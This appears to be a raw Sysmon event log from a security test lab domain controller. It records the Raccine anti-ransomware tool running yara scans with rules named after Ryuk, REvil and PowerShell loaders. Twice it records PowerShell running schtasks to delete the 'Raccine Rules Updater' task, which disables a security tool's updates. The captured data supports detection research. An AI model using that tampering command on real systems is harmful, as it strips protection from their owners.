10341000x80000000000000002292746Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 20:13:46.954{9DBE88B5-C32E-61A8-0D00-000000000E02}9084808C:\Windows\system32\svchost.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002288799Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 20:07:48.547{9DBE88B5-6214-61B2-190B-010000000E02}5084C:\Windows\System32\schtasks.exe10.0.14393.0 (rs1_release.160715-1616)Task Scheduler Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationsctasks.exe"C:\Windows\system32\schtasks.exe" /DELETE /TN "Raccine Rules Updater" /FC:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x80000000000000002288711Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 20:07:45.022{9DBE88B5-2F14-61B2-9603-010000000E02}80647708C:\Windows\explorer.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6165f|C:\Windows\System32\SHELL32.dll+62a85|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+7c2cf|C:\Windows\System32\windows.storage.dll+7b04f|C:\Windows\System32\windows.storage.dll+7dfef|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002288710Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 20:07:45.021{9DBE88B5-2F14-61B2-9603-010000000E02}80647708C:\Windows\explorer.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6299e|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+7c2cf|C:\Windows\System32\windows.storage.dll+7b04f|C:\Windows\System32\windows.storage.dll+7dfef|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002288709Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 20:07:45.021{9DBE88B5-2F14-61B2-9603-010000000E02}80647708C:\Windows\explorer.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618b4|C:\Windows\System32\SHELL32.dll+62967|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+7c2cf|C:\Windows\System32\windows.storage.dll+7b04f|C:\Windows\System32\windows.storage.dll+7dfef|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002288708Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 20:07:45.020{9DBE88B5-2F14-61B2-9603-010000000E02}80646016C:\Windows\explorer.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6165f|C:\Windows\System32\SHELL32.dll+62400|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002288707Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 20:07:45.019{9DBE88B5-2F14-61B2-9603-010000000E02}80646016C:\Windows\explorer.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c00|C:\Windows\System32\SHELL32.dll+623bc|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002288706Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 20:07:45.019{9DBE88B5-2F14-61B2-9603-010000000E02}80646016C:\Windows\explorer.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618b4|C:\Windows\System32\SHELL32.dll+62390|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002288705Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 20:07:45.019{9DBE88B5-2F14-61B2-9603-010000000E02}80646016C:\Windows\explorer.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002288662Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 20:07:41.564{9DBE88B5-620D-61B2-180B-010000000E02}6188C:\Windows\System32\schtasks.exe10.0.14393.0 (rs1_release.160715-1616)Task Scheduler Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationsctasks.exe"C:\Windows\system32\schtasks.exe" /DELETE /TN "Raccine Rules Updater" /FC:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002258864Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:52.026{9DBE88B5-587A-61B2-D309-010000000E02}3196ATTACKRANGE\AdministratorC:\Program Files\Raccine\Raccine.exeC:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac4B5D.tmpMD5=24A5DED9B4C83D1105BA1DA54B769959,SHA256=62299AC455D50DCA677B78D21FCA50EE9796E9996C14E3C7211828978A89281E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002258861Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.678{9DBE88B5-587A-61B2-EB09-010000000E02}75041292C:\Program Files\Raccine\yara64.exe{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\yara64.exe+8503f|C:\Program Files\Raccine\yara64.exe+7ce90|C:\Program Files\Raccine\yara64.exe+73b07|C:\Program Files\Raccine\yara64.exe+7303c|C:\Program Files\Raccine\yara64.exe+17c129|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258858Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.664{9DBE88B5-587A-61B2-EC09-010000000E02}73325024C:\Windows\system32\conhost.exe{9DBE88B5-587A-61B2-EB09-010000000E02}7504C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258852Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.653{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-587A-61B2-EB09-010000000E02}7504C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002258851Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.653{9DBE88B5-587A-61B2-D309-010000000E02}31966376C:\Program Files\Raccine\Raccine.exe{9DBE88B5-587A-61B2-EB09-010000000E02}7504C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+116f5|C:\Program Files\Raccine\Raccine.exe+6156|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002258850Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.653{9DBE88B5-587A-61B2-EB09-010000000E02}7504C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\in-memory\gen_loaders.yar" 6776 -d MemoryScan=1 -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Start Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-587A-61B2-D309-010000000E02}3196C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Start Wsearch 10341000x80000000000000002258847Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.638{9DBE88B5-587A-61B2-EA09-010000000E02}33367568C:\Windows\system32\conhost.exe{9DBE88B5-587A-61B2-E909-010000000E02}5824C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258840Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.626{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-587A-61B2-E909-010000000E02}5824C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002258839Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.626{9DBE88B5-587A-61B2-D309-010000000E02}31966376C:\Program Files\Raccine\Raccine.exe{9DBE88B5-587A-61B2-E909-010000000E02}5824C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002258838Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.626{9DBE88B5-587A-61B2-E909-010000000E02}5824C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\ryuk-commandlines.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac4B5D.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Start Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-587A-61B2-D309-010000000E02}3196C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Start Wsearch 10341000x80000000000000002258835Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.610{9DBE88B5-587A-61B2-E809-010000000E02}80201172C:\Windows\system32\conhost.exe{9DBE88B5-587A-61B2-E709-010000000E02}2392C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258829Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.599{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-587A-61B2-E709-010000000E02}2392C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002258828Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.599{9DBE88B5-587A-61B2-D309-010000000E02}31966376C:\Program Files\Raccine\Raccine.exe{9DBE88B5-587A-61B2-E709-010000000E02}2392C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002258827Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.599{9DBE88B5-587A-61B2-E709-010000000E02}2392C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\powershell_loaders.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac4B5D.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Start Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-587A-61B2-D309-010000000E02}3196C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Start Wsearch 10341000x80000000000000002258822Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.584{9DBE88B5-587A-61B2-E609-010000000E02}51326212C:\Windows\system32\conhost.exe{9DBE88B5-587A-61B2-E509-010000000E02}7912C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258816Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.573{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-587A-61B2-E509-010000000E02}7912C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002258815Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.573{9DBE88B5-587A-61B2-D309-010000000E02}31966376C:\Program Files\Raccine\Raccine.exe{9DBE88B5-587A-61B2-E509-010000000E02}7912C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002258814Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.572{9DBE88B5-587A-61B2-E509-010000000E02}7912C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\other_0xa9five_poc.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac4B5D.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Start Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-587A-61B2-D309-010000000E02}3196C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Start Wsearch 10341000x80000000000000002258811Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.556{9DBE88B5-587A-61B2-E409-010000000E02}75447988C:\Windows\system32\conhost.exe{9DBE88B5-587A-61B2-E309-010000000E02}6580C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258805Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.545{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-587A-61B2-E309-010000000E02}6580C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002258804Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.545{9DBE88B5-587A-61B2-D309-010000000E02}31966376C:\Program Files\Raccine\Raccine.exe{9DBE88B5-587A-61B2-E309-010000000E02}6580C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002258803Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.545{9DBE88B5-587A-61B2-E309-010000000E02}6580C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_revil.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac4B5D.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Start Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-587A-61B2-D309-010000000E02}3196C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Start Wsearch 10341000x80000000000000002258800Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.530{9DBE88B5-587A-61B2-E209-010000000E02}81447748C:\Windows\system32\conhost.exe{9DBE88B5-587A-61B2-E109-010000000E02}8176C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258794Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.519{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-587A-61B2-E109-010000000E02}8176C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002258793Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.519{9DBE88B5-587A-61B2-D309-010000000E02}31966376C:\Program Files\Raccine\Raccine.exe{9DBE88B5-587A-61B2-E109-010000000E02}8176C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002258792Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.519{9DBE88B5-587A-61B2-E109-010000000E02}8176C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_exchange_cryptominer.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac4B5D.tmp -d 